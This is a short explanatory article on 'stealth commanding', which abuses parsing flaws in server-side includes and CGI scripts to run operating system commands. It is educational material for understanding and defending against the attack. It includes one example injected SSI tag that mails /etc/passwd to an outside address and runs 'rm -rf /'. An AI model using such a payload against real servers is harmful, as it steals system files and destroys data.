Stealth commanding is a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server. Stealth commanding is primarily used in the execution of operating system commands, allowing complete takeover of the server.
Stealth commanding enables attackers to execute arbitrary system-level commands. Likely targets are server-side includes, parsed scripts, CGIs (such as Perl), code that appears to take input and turn it into OS commands, and anything that takes parameters and turns them into parsed protocols.
Most script languages used for CGIs simply chain strings together when receiving parameters. In many occasions these scripts rely on OS commands, therefore they are relatively easy to exploit. The most common type of scripts is Perl CGIs.
Server-side includes are an old technology, used in the past to provide minimal server-side scripting capabilities (commonly appearing in .SHTML files). Server-side includes are still supported by many Web servers. Following is a server-side include example, which builds the header and footer sections of a Web page:
<!--#include file="header.html" -->
<!--#include file="footer.html" -->
Include files are part of the HTML code that describes a page. If combined with user supplied dynamic data, include files can be malicious. An attacker can inject dangerous server-side include tags, which will later on be parsed by the server-side includes parser. For example, consider the following input for a bulletin board message:
Hi Kevin, I love the guestbook!
<!--#exec cmd="mail -s 'Ha Ha' firstname.lastname@example.org </etc/passwd; rm -rf /"-->
If the user's message is written to an HTML file that is subsequently parsed for server-side includes, the command will be executed each time the page is loaded and an email containing the "passwd" file will be sent to the attacker, and the computer will be erased.